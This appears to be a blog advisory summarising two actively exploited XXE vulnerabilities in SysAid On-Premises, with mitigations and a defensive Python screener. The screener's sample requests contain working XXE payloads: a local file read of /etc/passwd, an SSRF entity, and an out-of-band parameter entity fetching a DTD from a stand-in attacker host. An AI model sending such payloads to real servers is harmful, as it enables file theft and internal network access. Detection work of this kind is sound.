Bivash Nayak
24 Jul

This summary captures the core details of two critical vulnerabilities in SysAid On-Premises, an IT service management (ITSM) product used for help desk, ticketing, and asset management. Both flaws are unauthenticated XML External Entity (XXE) injections: they let an attacker perform server-side request forgery (SSRF), read arbitrary files, take over administrator accounts, and potentially achieve remote code execution (RCE). They were added to CISA's Known Exploited Vulnerabilities (KEV) catalog on July 22, 2025, based on evidence of active in-the-wild exploitation. While specific attack details (e.g., actors or campaigns) remain undisclosed, these vulnerabilities pose significant risk to organizations running on-premises SysAid deployments, potentially leading to data breaches or system compromise.

Key facts from reports:

  • Vulnerability Details:
    • CVE-2025-2775 affects the "Checkin processing functionality," allowing XXE to facilitate admin account takeover and local file reads (e.g., sensitive configs or credentials).
    • CVE-2025-2776 targets the "Server URL processing functionality," with similar XXE impacts, enabling SSRF for internal network pivoting or external data exfiltration.
    • Both are pre-authentication, rated critical (CVSS scores pending full NIST analysis, but estimated high due to unauth RCE potential). A related CVE-2025-2777 (XXE in another endpoint) is often mentioned in chains but not added to KEV.
  • Discovery and Timeline: Discovered by watchTowr Labs, publicly disclosed on May 7, 2025. Patches were released in SysAid version 24.4.60 (March 2025 update). Exploitation evidence prompted CISA's KEV addition on July 22, 2025; federal agencies must remediate by August 12, 2025 (per BOD 22-01).
  • Impact and Exploitation: Over 6,300 internet-exposed SysAid instances are potentially vulnerable, primarily in sectors like healthcare, education, and government. Attacks could lead to ransomware deployment (echoing a 2023 SysAid zero-day exploited by Cl0p) or espionage. No public indicators of compromise (IOCs) are available yet, but proof-of-concept (PoC) exploits exist for chaining these with CVE-2025-2777 for full RCE.
  • Response and Mitigations: SysAid urges immediate upgrades to version 24.4.60 b16 or later. CISA recommends applying patches, monitoring for anomalies (e.g., unusual XML requests), and isolating exposed systems. If patching isn't feasible, disable vulnerable endpoints or use web application firewalls (WAFs) to block XXE patterns. Security firms like SonicWall and Arctic Wolf have issued alerts with detection rules.
| Aspect | CVE-2025-2775 | CVE-2025-2776 | Recommendations |
|---|---|---|---|
| Affected Component | Checkin processing | Server URL processing | Scan for exposed instances using tools like Shodan or Hunter.how. |
| Vulnerability Type | Unauth XXE (admin takeover, file read) | Unauth XXE (SSRF, file read) | Enable logging for XML parsers; block external entity resolution. |
| Affected Versions | On-Prem <=23.3.40 | On-Prem <=23.3.40 | Upgrade to 24.4.60+; test in staging first. |
| KEV Addition Date | July 22, 2025 | July 22, 2025 | Federal due date: August 12, 2025; all orgs prioritize immediately. |
| Potential Impact | RCE via chains, data exfiltration | Internal network access, pivoting | Hunt for signs of compromise using EDR; rotate creds post-patch. |
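The mitigation guidance above (monitor for unusual XML requests, block XXE patterns at a WAF, and disable external entity resolution in the parser) comes down to one control: never let a DTD from an untrusted request reach an entity-resolving parser. The script below is an added example, not SysAid's or watchTowr's code, of that control in Python. It screens inbound XML bodies for the constructs every XXE variant depends on (a DOCTYPE, entity declarations, SYSTEM/PUBLIC external entities, parameter entities), refuses to parse any body that carries them, and triages a batch of constructed request records. The request IDs and bodies are constructed for illustration and are not captured SysAid traffic; `internal.example` and `attacker.example` are placeholder hosts.

```python
"""Screen inbound XML request bodies for XXE constructs before parsing.

Added example (not SysAid's or watchTowr's code). The request records below
are constructed for illustration; they are not captured SysAid traffic.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Each pattern is a prerequisite for some XXE variant, and none of them
# belongs in ordinary application XML, so a WAF rule or parser front-end
# can flag the request on any hit.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_DECL_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAMETER_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)


def screen_xml(body: str) -> list[str]:
    """Return the XXE-related findings present in one XML body, in a fixed order."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("doctype")           # any DTD at all is unusual in API traffic
    if ENTITY_DECL_RE.search(body):
        findings.append("entity-decl")       # internal entities: expansion (billion laughs)
    if EXTERNAL_ENTITY_RE.search(body):
        findings.append("external-entity")   # SYSTEM/PUBLIC: local file read or SSRF
    if PARAMETER_ENTITY_RE.search(body):
        findings.append("parameter-entity")  # %name: blind / out-of-band XXE
    return findings


def parse_untrusted(body: str) -> ET.Element:
    """Reject any body that carries a DTD, then parse it with the stdlib parser.

    Refusing the DOCTYPE outright is the same policy as the
    disallow-doctype-decl feature of Java XML parsers: with no DTD there are
    no entities for the parser to resolve, internal or external.
    """
    findings = screen_xml(body)
    if findings:
        raise ValueError(f"rejected XML request: {', '.join(findings)}")
    return ET.fromstring(body)


# Constructed request records: (hypothetical request id, body). The element
# names only hint at the two affected functionalities; they are not SysAid's
# real message formats.
REQUESTS = [
    ("req-1", '<?xml version="1.0"?><checkin><host>ws-01</host></checkin>'),
    ("req-2", '<?xml version="1.0"?>'
              '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
              '<checkin><host>&x;</host></checkin>'),
    ("req-3", '<!DOCTYPE r [<!ENTITY x SYSTEM "http://internal.example/">]>'
              '<serverurl>&x;</serverurl>'),
    ("req-4", '<!DOCTYPE r [<!ENTITY % p SYSTEM "http://attacker.example/x.dtd"> %p;]><r/>'),
    ("req-5", '<!DOCTYPE r [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]><r>&b;</r>'),
]


def triage(requests: list[tuple[str, str]]) -> dict[str, list[str]]:
    """Map each request id to its findings; clean requests map to an empty list."""
    return {rid: screen_xml(body) for rid, body in requests}


if __name__ == "__main__":
    for rid, findings in triage(REQUESTS).items():
        print(rid, "ALERT " + ", ".join(findings) if findings else "ok")
```

Run it and only `req-1` passes; the other four are flagged before any parser sees them, with `req-4` also carrying the parameter-entity marker that distinguishes blind XXE from a simple in-band file read. The same screening function can feed a SIEM rule (alert on any finding against the XML-consuming endpoints) and, applied at the application boundary, is the compensating control to use where the 24.4.60 upgrade cannot be applied immediately.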

This incident underscores the dangers of unpatched on-premises ITSM tools, especially given SysAid's history of zero-day exploits. For PoC code or detailed technical analysis, check watchTowr Labs' resources. If you need help with detection scripts, patch verification, or further investigation into related threats, provide more details!
